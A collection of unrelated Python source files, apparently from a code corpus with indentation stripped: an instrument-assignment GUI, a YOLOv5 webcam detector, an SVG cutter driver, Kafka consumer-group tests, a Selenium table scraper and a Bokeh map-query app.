self.buttonNotDone = wx.Button(self, id = wx.ID_CANCEL, label = "No thanks")
self.Bind(wx.EVT_BUTTON, self.onDone, self.buttonDone)
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(self.listHeader, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.address, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.buttonDone, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.buttonNotDone, 0, wx.ALL|wx.EXPAND, 5)
self.SetSizerAndFit(main_sizer)
def onDone(self, event):
if self.address.GetLineLength(0) == 0:
wx.MessageDialog(self, 'Please input an address or press "No thanks"').ShowModal()
else:
self.EndModal(wx.ID_OK)
class mainIntroPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self,parent)
self.openedResList = []
self.devInfoList = []
self.devNameList = []
self.macros = []
self.devNameListInit = instrument_names()
self.btnPanel = btnIntroPanel(self, self.devNameListInit)
self.listPanel = listIntroPanel(self)
self.assignPanel = assignIntroPanel(self)
self.configPath = os.path.abspath("Config Files")
self.macroPath = os.path.abspath("macros")
self.autosaveFile = os.path.join(self.macroPath, 'lastsession.ses')
self.macros = []
# ==============================================================================================================
# Binding buttons to their respective functions is extremely important. Once again, even though the names are
# arbitrary, it is good practice to name buttons and functions with similar names if they are to be bound together.
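        # The generic wx pattern assumed throughout this block is
        #   self.Bind(wx.EVT_BUTTON, <handler>, <button>)
        # i.e. the panel routes each button's click event to a named handler; the loop below
        # applies it to every device button created in btnIntroPanel.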
for i in range(len(self.btnPanel.button)):
self.Bind(wx.EVT_BUTTON, self.onDevBtn, self.btnPanel.button[i])
self.Bind(wx.EVT_BUTTON, self.onDone, self.btnPanel.buttonDone)
self.Bind(wx.EVT_BUTTON, self.onClear, self.btnPanel.buttonClear)
self.Bind(wx.EVT_BUTTON, self.onSave, self.btnPanel.bmapBtnSave)
self.Bind(wx.EVT_BUTTON, self.onOpen, self.btnPanel.bmapBtnOpen)
self.Bind(wx.EVT_BUTTON, self.onRefr, self.btnPanel.bmapBtnRefr)
# self.Bind(wx.EVT_BUTTON, self.onOpenMacro, self.btnPanel.bmapMacroBtnOpen)
# self.Bind(wx.EVT_BUTTON, self.onRefrMacro, self.btnPanel.bmapMacroBtnRefr)
# ==============================================================================================================
main_sizer = wx.BoxSizer(wx.HORIZONTAL)
main_sizer.Add(self.btnPanel, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.listPanel, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.assignPanel, 0, wx.ALL|wx.EXPAND, 5)
self.SetSizerAndFit(main_sizer)
def onDevBtn(self, event):
label = event.GetEventObject().GetLabel()
selec = self.listPanel.listFiles.GetSelection()
        if selec < 0:
            stringResult = "Please select a device from the panel on the right before assigning a name"
            self.btnPanel.txtAssignResult.SetValue(stringResult)
            return
stringName = self.listPanel.listFiles.GetString(selec)
device = self.listPanel.foundDevices.get(stringName, False)
if device == False:
raise Exception(f"Device {stringName} not found in listPanel.foundDevices, this should be impossible")
self.devInfoList.append(device)
self.devNameList.append(label)
stringResult = f"Device with IDN {device['idn']} assigned to a {label} Unit"
self.btnPanel.txtAssignResult.SetValue(stringResult)
self.listPanel.listFiles.Delete(selec)
del self.listPanel.foundDevices[stringName]
self.assignPanel.assignedDevices[stringName] = device
devIndex = self.devNameList.index(label)
stringAssign = "{0} {1} --> {2}".format(label, devIndex, stringName)
self.assignPanel.listAssignment.InsertItems([stringAssign], 0)
def onDone(self, event):
mixedList = [self.devInfoList, self.devNameList]
self.openedResList = []
for i in self.devInfoList:
self.openedResList.append(self.listPanel.rm.open_resource(i["address"]))
mixedList.append(self.openedResList)
# Write the autosave file
saveSession.saveSession(self.devInfoList, self.devNameList, self.macros, filename = self.autosaveFile)
pub.sendMessage('RecorderLoad', msg = (self.devInfoList, self.devNameList, self.macros))
pub.sendMessage('AssigningDone', msg = mixedList)
pub.sendMessage('MacroOpen', msg={"macros": self.macros, "devInfo": self.devInfoList, "devName": self.devNameList})
def onClear(self, event):
a = self.listPanel.listFiles.GetCount()
b = self.assignPanel.listAssignment.GetCount()
for i in range(a):
self.listPanel.listFiles.Delete(0)
for i in range(b):
self.assignPanel.listAssignment.Delete(0)
self.listPanel.foundDevices = {}
self.listPanel.foundDevices = self.assignPanel.assignedDevices
self.assignPanel.assignedDevices = {}
self.devInfoList = []
self.devNameList = []
try:
self.listPanel.listFiles.InsertItems(self.listPanel.onlyFiles, 0)
except:
print("No Devices Connected.")
stringResult = "All assignments cleared"
self.btnPanel.txtAssignResult.SetValue(stringResult)
pub.sendMessage('AssignCleared', msg=[])
def onSave(self, event):
# UserName = self.btnPanel.txtFileName.GetValue()
saveSession.saveSession(self.devInfoList, self.devNameList)
def loadPrevious(self):
found = False
newInfoList = []
newNameList = []
for devInfo, devName in zip(self.devInfoList, self.devNameList):
found = False
count = 0
for panelName, device in self.listPanel.foundDevices.items():
if devInfo["idn"] == device["idn"]:
found = True
self.listPanel.listFiles.Delete(count)
del self.listPanel.foundDevices[panelName]
self.assignPanel.assignedDevices[panelName] = device
devIndex = self.devNameList.index(devName)
stringAssign = "{0} {1} --> {2}".format(devName, devIndex, panelName)
self.assignPanel.listAssignment.InsertItems([stringAssign], 0)
newInfoList.append(device)
newNameList.append(devName)
break # Not necessary but we might as well quit early
count += 1
if not found:
errorMes = f"Could not find {devName}\nIDN: {devInfo['idn']}\nAddress: {devInfo['address']}"
bail = False
with missingDevicePopup(self, errorMes, self.listPanel.listFiles.GetItems()) as pop:
returnId = pop.ShowModal()
if returnId == ID_DEVICE_FOUND: # Great, Add the device
selec = pop.listFiles.GetSelection()
if selec < 0:
bail = True
stringName = pop.listFiles.GetString(selec)
device = self.listPanel.foundDevices.get(stringName, False)
if device == False:
raise Exception(f"Device {stringName} not found in listPanel.foundDevices, this should be impossible")
self.listPanel.listFiles.Delete(selec)
del self.listPanel.foundDevices[stringName]
self.assignPanel.assignedDevices[stringName] = device
devIndex = self.devNameList.index(devName)
stringAssign = "{0} {1} --> {2}".format(devName, devIndex, stringName)
self.assignPanel.listAssignment.InsertItems([stringAssign], 0)
newInfoList.append(device)
newNameList.append(devName)
elif returnId == ID_DEVICE_NOT_FOUND: # Let's give a custom address
with customAddressPopup(self) as addrPop:
if addrPop.ShowModal() == wx.ID_OK:
address = addrPop.address.GetLineText(0)
entry, device = getDeviceInfo(self.listPanel.rm, address)
stringAssign = "{0} {1} --> {2}".format(devName, 0, entry)
self.assignPanel.listAssignment.InsertItems([stringAssign], 0)
newInfoList.append(device)
newNameList.append(devName)
else: # User doesn't have an address, bail early
bail = True
else: # Bail early
bail = True
if bail: # User wants to skip this device
print("Skipping!")
self.devInfoList = newInfoList
self.devNameList = newNameList
stringResult = "Finished loading previous assignment"
self.btnPanel.txtAssignResult.SetValue(stringResult)
def onOpen(self, event):
tkinter.Tk().withdraw() # Close the root window
self.devInfoList, self.devNameList, self.macros = saveSession.loadSession()
self.loadPrevious()
self.onDone(event)
def onRefr(self, event):
self.devInfoList, self.devNameList, self.macros = saveSession.loadSession(filename = self.autosaveFile)
self.loadPrevious()
mixedList = [self.devInfoList, self.devNameList]
for i in self.devInfoList:
self.openedResList.append(self.listPanel.rm.open_resource(i["address"]))
mixedList.append(self.openedResList)
pub.sendMessage('RecorderLoad', msg = (self.devInfoList, self.devNameList, self.macros))
pub.sendMessage('AssigningDone', msg = mixedList)
pub.sendMessage('MacroOpen', msg={"macros": self.macros, "devInfo": self.devInfoList, "devName": self.devNameList})
def onOpenMacro(self, event):
self.onOpen(event)
pub.sendMessage('MacroOpen', msg={"macros": self.macros})
def onRefrMacro(self, event):
self.onRefr(event)
pub.sendMessage('MacroOpen', msg={"macros": self.macros, "devInfo": self.devInfoList, "devName": self.devNameList})
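# Hedged usage sketch (not part of the original module): mainIntroPanel is normally hosted by a
# larger wx application. A minimal standalone host could look like the block below; the frame
# title is an arbitrary placeholder, and the icon files and VISA backend that the module itself
# already requires are assumed to be available.
if __name__ == "__main__":
    app = wx.App(False)
    frame = wx.Frame(None, title="Instrument Assignment")
    mainIntroPanel(frame)
    frame.Fit()
    frame.Show()
    app.MainLoop()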
|
cam_video.py
|
# cam_video.py
import cv2
import time
import numpy as np
import torch
import threading
torch.device('cpu')
# global variable to exit the run by pressing some user specific keystroke
exit = 0
def analyze_cv_single_picture():
global exit
try:
model = torch.hub.load('ultralytics/yolov5', 'yolov5s', pretrained=True)
cap = cv2.VideoCapture(0)
i = 0
target_x = 0
target_y = 0
print(f'target is : {target}')
while not exit and i<4:
i += 1
start = time.time()
ret, frame = cap.read()
if not ret:
print('Could not read frame.')
break
# imgs = ['https://ultralytics.com/images/zidane.jpg'] # batch of images
# Inference
results = model(frame)
# Results
#results.print()
#results.save() # or .show()
#results.show()
#results.xyxy[0]
cv2.imshow('result', np.asarray(results.imgs[0], dtype=np.uint8))
print(f'results.pandas().xyxy[0]:\n{results.pandas().xyxy[0]}') # img1 predictions (pandas)
# xmin ymin xmax ymax confidence class name
# 0 749.50 43.50 1148.0 704.5 0.874023 0 person
# 1 433.50 433.50 517.5 714.5 0.687988 27 tie
# 2 114.75 195.75 1095.0 708.0 0.624512 0 person
# 3 986.00 304.00 1028.0 420.0 0.286865 27 tie
results_df = results.pandas().xyxy[0]
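            # A small optional refinement (assumption, not in the original script): very low
            # confidence detections could be dropped before searching for the target, e.g.
            #   results_df = results_df[results_df['confidence'] > 0.5]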
            target_df = results_df[results_df['name'].isin([target])]  # filter on specific values
if target_df.size > 0:
print(f'target_df.size is {target_df.size}')
x = target_df["xmin"].values[0]
y = target_df["ymin"].values[0]
print(f'found {target} in x={x} and y={y}')
if target_x!=0 and target_y!=0:
if target_x>x:
print('target moved left')
else:
print('target moved right')
target_x = x
target_y = y
stop = time.time()
seconds = stop - start
print(f'Time taken : {seconds} seconds')
            # Calculate frames per second
fps = 1 / seconds
print(f'Estimated frames per second : {fps}')
key = cv2.waitKey(0) & 0xFF
if key == ord('q'):
print('Quitting.')
break
finally:
cap.release()
#cv2.destroyAllWindows()
print('Detections have been performed successfully.')
def get_user_input():
global exit
keystrk = input('Press a key to exit.\n')
    # thread doesn't continue until a key is pressed
print('done')
exit = 1
if __name__ == '__main__':
target = 'person'
analyze_cv_single_picture()
#analyze = threading.Thread(target=analyze_cv_single_picture)
#user_input = threading.Thread(target=get_user_input)
#analyze.start()
#user_input.start()
#analyze.join()
#user_input.join()
|
printsvg.py
|
#!/usr/bin/env python
import argparse
import math
import sys
from multiprocessing import Process, Queue
from xml.dom import minidom
import kdtree
import shapely.ops
import svg.path
from shapely.geometry import LineString
from graph import *
try:
import silhouette
units = silhouette.units
except ImportError:
sys.stderr.write("Warning: no silhouette module available\n")
sys.exit(1)
units.define("pixel = inch / 72 = px")
def to_steps(thing):
if type(thing) in (tuple, list) and len(thing) == 2 and type(thing[0]) in (int, float):
(x, y) = thing
x *= units["pixel"]
y *= units["pixel"]
# flip x
x = (12 * units["inch"]) - x
x = x.to("steps").magnitude
y = y.to("steps").magnitude
return x, y
return map(to_steps, thing)
def draw_rect(cutter, **kw):
x = float(kw["x"])
y = float(kw["y"])
width = float(kw["width"])
height = float(kw["height"])
move = (x, y)
draw = [(x + width, y), (x + width, y + height), (x, y + height), (x, y)]
cutter.position = to_steps(move)
cutter.draw(to_steps(draw))
def walk_graph(graph, node):
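    # Depth-first walk that consumes every edge of the bidirected graph exactly once, starting
    # at `node`; nodes popped while backtracking are buffered in `reverse` and spliced into the
    # path only when the walk moves forward again, so the returned node list forms one
    # continuous stroke for the cutter.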
stack = [node]
reverse = []
path = [node]
while stack:
node = stack[-1]
children = [nnode for nnode in graph[node] if not graph[node][nnode]["visited"]]
if children:
child = children[0]
graph[node][child]["visited"] = True
if reverse:
path += reverse
reverse = []
path.append(child)
stack.append(child)
continue
# no children
stack.pop()
if stack:
reverse.append(stack[-1])
return path
def build_path_commands(tree, graph):
cursor = (0, 0)
next_node = tree.search_nn(cursor)
nodes = []
culled = set()
while next_node:
(next_point, distance) = next_node
next_point = next_point.data
distance = math.sqrt(distance)
tree = tree.remove(next_point)
culled.add(next_point)
if nodes and distance > 16:
yield nodes
nodes = []
nodes += walk_graph(graph, next_point)
for node in nodes:
if node in culled:
continue
tree = tree.remove(node) or tree
culled.add(node)
next_node = tree.search_nn(nodes[-1])
if nodes:
yield nodes
def graph_lines(lines):
graph = BidirectedGraph()
if isinstance(lines, LineString):
lines = [lines]
for line in lines:
last_coord = None
for coord in line.coords:
if coord not in graph:
graph.add_node(coord)
if last_coord:
val = {"visited": False}
graph.connect(coord, last_coord, val)
last_coord = coord
return graph
def simplify_path(path):
lines = svg.path.parse_path(path)
coords = [lines[0].start]
for line in lines:
if type(line) != svg.path.Line:
            raise ValueError('The SVG file contains an unsupported path segment: {}.'.format(type(line)))
coords.append(line.end)
coords = [(c.real, c.imag) for c in coords]
lines = to_steps(coords)
lines = [list(lines)]
result = shapely.ops.linemerge(lines)
print("building graph")
graph = graph_lines(result)
print("building kdtree")
tree = kdtree.create(list(graph.keys()))
return build_path_commands(tree, graph)
def produce_paths(svgfn, path_queue):
fh = open(svgfn)
doc = minidom.parse(fh)
paths = doc.getElementsByTagName("path")
for path in paths:
points = path.getAttribute('d')
subpaths = simplify_path(points)
for subpath in subpaths:
path_queue.put(subpath)
rects = doc.getElementsByTagName("rect")
for rect in rects:
path_queue.put(dict(rect.attributes.items()))
path_queue.put("done")
def draw_svg(worker, path_queue, connect_kws=None):
if connect_kws is None: connect_kws = {}
cutter = connect(**connect_kws)
try:
while 1:
thing = path_queue.get()
if thing == "done":
break
if type(thing) == dict:
for rpt in range(3):
draw_rect(cutter, **thing)
else:
cutter.position = thing[0]
cutter.draw(thing)
worker.join()
finally:
cutter.home()
def connect(**kw):
cutter = silhouette.Silhouette(**kw)
cutter.connect()
print("speed")
cutter.speed = 8
print("pressure")
cutter.pressure = 4
print("media")
cutter.media = 113
print("offset")
cutter.offset = 0
return cutter
if __name__ == "__main__":
path_queue = Queue()
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--output-file',
help='Save commands to a file instead of sending to the cutter')
parser.add_argument('svg_img', metavar='SVG_IMG', help='Filename of the SVG image to be cut')
args = parser.parse_args()
worker = Process(target=produce_paths, args=(args.svg_img, path_queue))
worker.start()
if args.output_file:
with open(args.output_file, 'wb') as of:
draw_svg(worker, path_queue, connect_kws={'output_file': of})
else:
draw_svg(worker, path_queue)
|
test_consumer_group.py
|
import collections
import logging
import threading
import time
import pytest
from kafka.vendor import six
from kafka.conn import ConnectionStates
from kafka.consumer.group import KafkaConsumer
from kafka.coordinator.base import MemberState
from kafka.structs import TopicPartition
from test.testutil import env_kafka_version, random_string
def get_connect_str(kafka_broker):
return kafka_broker.host + ':' + str(kafka_broker.port)
@pytest.mark.skipif(not env_kafka_version(), reason="No KAFKA_VERSION set")
def test_consumer(kafka_broker, topic):
# The `topic` fixture is included because
# 0.8.2 brokers need a topic to function well
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
consumer.poll(500)
assert len(consumer._client._conns) > 0
node_id = list(consumer._client._conns.keys())[0]
assert consumer._client._conns[node_id].state is ConnectionStates.CONNECTED
consumer.close()
@pytest.mark.skipif(not env_kafka_version(), reason="No KAFKA_VERSION set")
def test_consumer_topics(kafka_broker, topic):
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
# Necessary to drive the IO
consumer.poll(500)
assert topic in consumer.topics()
assert len(consumer.partitions_for_topic(topic)) > 0
consumer.close()
@pytest.mark.skipif(env_kafka_version() < (0, 9), reason='Unsupported Kafka Version')
def test_group(kafka_broker, topic):
num_partitions = 4
connect_str = get_connect_str(kafka_broker)
consumers = {}
stop = {}
threads = {}
    messages = collections.defaultdict(lambda: collections.defaultdict(list))
group_id = 'test-group-' + random_string(6)
def consumer_thread(i):
assert i not in consumers
assert i not in stop
stop[i] = threading.Event()
consumers[i] = KafkaConsumer(topic,
bootstrap_servers=connect_str,
group_id=group_id,
heartbeat_interval_ms=500)
while not stop[i].is_set():
            for tp, records in six.iteritems(consumers[i].poll(100)):
messages[i][tp].extend(records)
consumers[i].close()
consumers[i] = None
stop[i] = None
num_consumers = 4
for i in range(num_consumers):
t = threading.Thread(target=consumer_thread, args=(i,))
t.start()
threads[i] = t
try:
timeout = time.time() + 35
while True:
for c in range(num_consumers):
# Verify all consumers have been created
if c not in consumers:
break
# Verify all consumers have an assignment
elif not consumers[c].assignment():
break
# If all consumers exist and have an assignment
else:
logging.info('All consumers have assignment... checking for stable group')
# Verify all consumers are in the same generation
# then log state and break while loop
generations = set([consumer._coordinator._generation.generation_id
for consumer in list(consumers.values())])
# New generation assignment is not complete until
# coordinator.rejoining = False
rejoining = any([consumer._coordinator.rejoining
for consumer in list(consumers.values())])
if not rejoining and len(generations) == 1:
for c, consumer in list(consumers.items()):
logging.info("[%s] %s %s: %s", c,
consumer._coordinator._generation.generation_id,
consumer._coordinator._generation.member_id,
consumer.assignment())
break
else:
logging.info('Rejoining: %s, generations: %s', rejoining, generations)
time.sleep(1)
assert time.time() < timeout, "timeout waiting for assignments"
logging.info('Group stabilized; verifying assignment')
group_assignment = set()
for c in range(num_consumers):
assert len(consumers[c].assignment()) != 0
assert set.isdisjoint(consumers[c].assignment(), group_assignment)
group_assignment.update(consumers[c].assignment())
assert group_assignment == set([
TopicPartition(topic, partition)
for partition in range(num_partitions)])
logging.info('Assignment looks good!')
finally:
logging.info('Shutting down %s consumers', num_consumers)
for c in range(num_consumers):
logging.info('Stopping consumer %s', c)
stop[c].set()
threads[c].join()
threads[c] = None
@pytest.mark.skipif(not env_kafka_version(), reason="No KAFKA_VERSION set")
def test_paused(kafka_broker, topic):
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
topics = [TopicPartition(topic, 1)]
consumer.assign(topics)
assert set(topics) == consumer.assignment()
assert set() == consumer.paused()
consumer.pause(topics[0])
assert set([topics[0]]) == consumer.paused()
consumer.resume(topics[0])
assert set() == consumer.paused()
consumer.unsubscribe()
assert set() == consumer.paused()
consumer.close()
@pytest.mark.skipif(env_kafka_version() < (0, 9), reason='Unsupported Kafka Version')
def test_heartbeat_thread(kafka_broker, topic):
group_id = 'test-group-' + random_string(6)
consumer = KafkaConsumer(topic,
bootstrap_servers=get_connect_str(kafka_broker),
group_id=group_id,
heartbeat_interval_ms=500)
# poll until we have joined group / have assignment
while not consumer.assignment():
consumer.poll(timeout_ms=100)
assert consumer._coordinator.state is MemberState.STABLE
last_poll = consumer._coordinator.heartbeat.last_poll
last_beat = consumer._coordinator.heartbeat.last_send
timeout = time.time() + 30
while True:
if time.time() > timeout:
raise RuntimeError('timeout waiting for heartbeat')
if consumer._coordinator.heartbeat.last_send > last_beat:
break
time.sleep(0.5)
assert consumer._coordinator.heartbeat.last_poll == last_poll
consumer.poll(timeout_ms=100)
assert consumer._coordinator.heartbeat.last_poll > last_poll
consumer.close()
|
browser.py
|
'''
Copyright (c) 2019 Vanessa Sochat
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from random import choice
from threading import Thread
from selenium import webdriver
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
import webbrowser
from time import sleep
import json
import shutil
import re
import sys
import os
class BrowserServer(SimpleHTTPRequestHandler):
'''here we subclass SimpleHTTPServer to capture error messages
'''
def log_message(self, format, *args):
'''log to standard error with a date time string,
and then call any subclass specific logging functions
'''
sys.stderr.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format%args))
# Workaround for error trying to GET html
if not re.search("div",format%args) and not re.search("function",format%args):
if re.search("404",format%args):
raise IOError(format%args)
def log_error(self, format, *args):
'''log_error
catch errors in the log_messages instead
'''
pass
class BrowserRobot(object):
''' bring up a server with a custom robot
Defaults
==========
pause_time: time to wait between browser commands
port: a random choice between 8000 and 9999
'''
def __init__(self, **kwargs):
self.Handler = BrowserServer
if "port" in kwargs:
self.port = kwargs['port']
else:
self.port = choice(range(8000,9999))
print('Selected port is %s' %self.port)
self.httpd = TCPServer(("", self.port), self.Handler)
self.server = Thread(target=self.httpd.serve_forever)
self.server.setDaemon(True)
self.server.start()
self.started = True
self.pause_time = 100
self.browser = None
self.headless = False
self.display = None
self.driver = "Chrome"
if "browser" in kwargs:
self.driver = kwargs['browser']
def get_and_wait(self, url, sleep_seconds=0):
'''a helper function to get a browser and wait a randomly
selected number of seconds between 0 and 2'''
self.get_browser()
wait_time = choice([0, 0.25, 0.5, 0.75, 1, 1.5, 2])
        self.browser.implicitly_wait(wait_time)  # element lookups retry for up to wait_time seconds
self.browser.set_page_load_timeout(10)
self.get_page(url)
sleep(sleep_seconds)
def get_browser(self, name=None):
'''get_browser
return a browser if it hasn't been initialized yet
'''
if name is None:
name=self.driver
log_path = "%s-driver.log" % name.lower()
if self.browser is None:
options = self.get_options()
            if name.lower() == "firefox":
self.browser = webdriver.Firefox(service_log_path=log_path)
else:
self.browser = webdriver.Chrome(service_log_path=log_path,
options=options)
return self.browser
def get_options(self, width=1200, height=800):
'''return options for headless, no-sandbox, and custom width/height
'''
options = webdriver.ChromeOptions()
options.add_argument("headless")
options.add_argument("no-sandbox")
        options.add_argument("window-size=%s,%s" % (width, height))
return options
def get_page(self, url, name='Chrome'):
'''get_page
open a particular url, checking for Timeout
'''
if self.browser is None:
self.browser = self.get_browser(name)
try:
return self.browser.get(url)
except TimeoutException:
print('Browser request timeout. Are you connected to the internet?')
self.browser.close()
sys.exit(1)
def stop(self):
'''close any running browser or server, and shut down the robot
'''
if self.browser is not None:
self.browser.close()
self.httpd.server_close()
if self.display is not None:
self.display.close()
    def run_javascript(self, code):
        if self.browser is not None:
            return self.browser.execute_script(code)
class ScraperRobot(BrowserRobot):
def __str__(self):
return "[browser-robot]"
def __repr__(self):
return "[browser-robot]"
def get_download_urls(self, url):
'''download paginated charge sheets
Parameters
==========
uri: the Docker Hub uri to parse.
'''
self.get_and_wait(url)
javascript = 'return document.getElementsByTagName("a")'
result = self.browser.execute_script(javascript)
for link in result:
if link.text == "All":
break
# Show all tables with prices
link.click()
# Get tables
javascript = 'return document.getElementsByTagName("tbody")'
tables = self.browser.execute_script(javascript)
entries = [['service', 'price', 'hospital_stay_range']]
for table in tables:
rows = table.find_elements_by_tag_name('tr')
for row in rows:
cols = row.find_elements_by_tag_name('td')
entries.append([c.text for c in cols])
return entries
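# Hedged usage sketch (not part of the original module): the URL is a placeholder, only the
# ScraperRobot/BrowserRobot API defined above is used, and a working chromedriver install is
# assumed.
if __name__ == "__main__":
    robot = ScraperRobot()
    try:
        # Fetch and print the first few scraped table rows from a hypothetical charge-sheet page.
        rows = robot.get_download_urls("https://example.com/charges")
        for row in rows[:5]:
            print(row)
    finally:
        robot.stop()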
|
main.py
|
from __future__ import print_function
from bokeh.plotting import figure, curdoc
from bokeh.tile_providers import STAMEN_TERRAIN_RETINA, get_provider
from bokeh.models import ColumnDataSource, WheelZoomTool, Band, Button, LabelSet, Dropdown, TapTool, Quad
from bokeh.layouts import column, row
from bokeh.events import ButtonClick, Tap
import pandas as pd
from io import StringIO
import numpy as np
import json
import requests
from shapely import wkt
import geopandas
from colour import Color
from pyproj import Transformer
from types import FunctionType
from copy import copy
import tkinter as tk
from tkinter import ttk, StringVar
from tkinter.filedialog import askopenfilename
import tkinter.simpledialog
from tkinter import Toplevel, Label
import threading
import time
####################################################################################
################################# GLOBAL VARIABLES #################################
####################################################################################
service_url = 'http://localhost:8080/'
query_url = service_url + 'runQuery'
build_index_url = service_url + 'buildIndex'
get_rootMBR_url = service_url + 'getRootMBR'
default_selected_bundle = 0
max_k1 = 26
max_bundles = 10
default_k1 = 5
default_k2 = 5
initial_query_x1 = -18823760.30596319
initial_query_x2 = 21410224.676255226
initial_query_y1 = -8443745.818059208
initial_query_y2 = 19211608.358907666
default_query_x1 = -18823760.30596319
default_query_x2 = 21410224.676255226
default_query_y1 = -8443745.818059208
default_query_y2 = 19211608.358907666
default_scale = 15000
query_x1 = 0
query_x2 = 0
query_y1 = 0
query_y2 = 0
geoms = 0
bundles = 0
window = None
message = None
response = None
filename = None
cancelled = True
local_entry = None
remote_entry = None
####################################################################################
####################################################################################
####################################################################################
##################################### CLASSES ######################################
####################################################################################
class show_message(Toplevel):
def __init__(self, master, positionRight, positionDown):
Toplevel.__init__(self, master)
master.withdraw()
self.title("Loading...")
label = tk.Label(self, text="Please Wait...")
label.pack(side="top", fill="both", expand=True, padx=30, pady=20)
self.geometry("+{}+{}".format(positionRight+500, positionDown))
self.lift()
self.attributes('-topmost',True)
self.after_idle(self.attributes, '-topmost',False)
class GUI_local:
def __init__(self, window):
global input_text1, input_text2, filename, cancelled, local_entry, remote_entry
cancelled = True
self.path = ''
window.title("Open Dataset...")
window.resizable(0, 0) # this prevents from resizing the window
window.geometry("763x35")
local_entry = ttk.Entry(window, width = 70)
local_entry.grid(row = 0, column = 0, ipadx=5, ipady=4)
ttk.Button(window, text = "Browse", command = lambda: self.set_path_local_field()).grid(row = 0, column=1, ipadx=5, ipady=5)
local = ttk.Button(window, text = "OK", command = lambda: self.get_filepath()).grid(row = 0, column=2, ipadx=5, ipady=5)
def set_path_local_field(self):
global local_entry, window, input_text1
self.path = askopenfilename(filetypes=[("CSV files", ".csv")], parent=window)
local_entry.delete(0, "end")
local_entry.insert(0, self.path)
def get_filepath(self):
global window, filename, cancelled, local_entry
cancelled = False
filename = local_entry.get()
window.destroy()
class GUI_remote:
def __init__(self, window):
global input_text1, input_text2, filename, cancelled, local_entry, remote_entry
cancelled = True
self.path = ''
window.title("Open Dataset...")
window.resizable(0, 0) # this prevents from resizing the window
window.geometry("673x35")
remote_entry = ttk.Entry(window, width = 70)
remote_entry.grid(row = 0, column = 0, ipadx=5, ipady=4)
remote = ttk.Button(window, text = "OK", command = lambda: self.get_filepath()).grid(row = 0, column=1, ipadx=5, ipady=5)
def get_filepath(self):
global window, filename, cancelled, remote_entry
cancelled = False
filename = remote_entry.get()
window.destroy()
####################################################################################
#################################### FUNCTIONS #####################################
####################################################################################
def get_scale():
global query_x1, query_x2
x_range = default_query_x2-default_query_x1
new_x_range = query_x2-query_x1
new_scale = (new_x_range * default_scale) / x_range
return new_scale
def get_query_from_scale(new_scale):
global default_query_x1, default_query_x2, default_query_y1, default_query_y2
x_range = abs(default_query_x2-default_query_x1)
new_x_range = (x_range * new_scale) / default_scale
diff_x = abs(x_range - new_x_range)
if new_x_range > x_range:
new_query_x1 = default_query_x1 - (diff_x/2)
new_query_x2 = default_query_x2 + (diff_x/2)
else:
new_query_x1 = default_query_x1 + (diff_x/2)
new_query_x2 = default_query_x2 - (diff_x/2)
y_range = abs(default_query_y2-default_query_y1)
new_y_range = (y_range * new_scale) / default_scale
diff_y = abs(y_range - new_y_range)
if new_y_range > y_range:
new_query_y1 = default_query_y1 - (diff_y/2)
new_query_y2 = default_query_y2 + (diff_y/2)
else:
new_query_y1 = default_query_y1 + (diff_y/2)
new_query_y2 = default_query_y2 - (diff_y/2)
return new_query_x1, new_query_x2, new_query_y1, new_query_y2
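# Illustrative sanity check (not part of the original code): get_query_from_scale(default_scale)
# returns the default query window unchanged, while get_query_from_scale(2 * default_scale)
# doubles both coordinate ranges around the same centre.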
def lon_to_web_mercator(lon):
k = 6378137
return lon * (k * np.pi / 180.0)
def lat_to_web_mercator(lat):
k = 6378137
return np.log(np.tan((90 + lat) * np.pi / 360.0)) * k
def wgs84_to_web_mercator(df, lon="lon", lat="lat"):
"""Converts decimal longitude/latitude to Web Mercator format"""
k = 6378137
df["x"] = df[lon] * (k * np.pi / 180.0)
df["y"] = np.log(np.tan((90 + df[lat]) * np.pi / 360.0)) * k
return df
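# Example (illustrative only): wgs84_to_web_mercator(pd.DataFrame({"lon": [23.73], "lat": [37.98]}))
# returns the frame with added "x" and "y" columns holding the Web Mercator coordinates of that point.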
def epsg3627_to_web_mercator(coords):
transformer = Transformer.from_crs("epsg:3627", "epsg:4326")
x1, y1 = coords[0], coords[1]
    x2, y2 = transformer.transform(x1, y1)
x2 = lat_to_web_mercator(x2)
y2 = lon_to_web_mercator(y2)
return (y2, x2)
def get_spatial_data(selected_bundle):
global geoms, bundles, default_k1
centroidsX = []
centroidsY = []
areas = []
cols = []
counts = []
geometries = []
top = []
bottom = []
left = []
right = []
selected_geoms = geoms.loc[geoms['bundle'] == selected_bundle].reset_index(drop=True)
for i in list(range(0, len(selected_geoms['geometries']))):
X = lon_to_web_mercator(selected_geoms['geometries'][i].centroid.coords[0][0])
Y = lat_to_web_mercator(selected_geoms['geometries'][i].centroid.coords[0][1])
if (X not in centroidsX) and (Y not in centroidsY):
centroidsX.append(X)
centroidsY.append(Y)
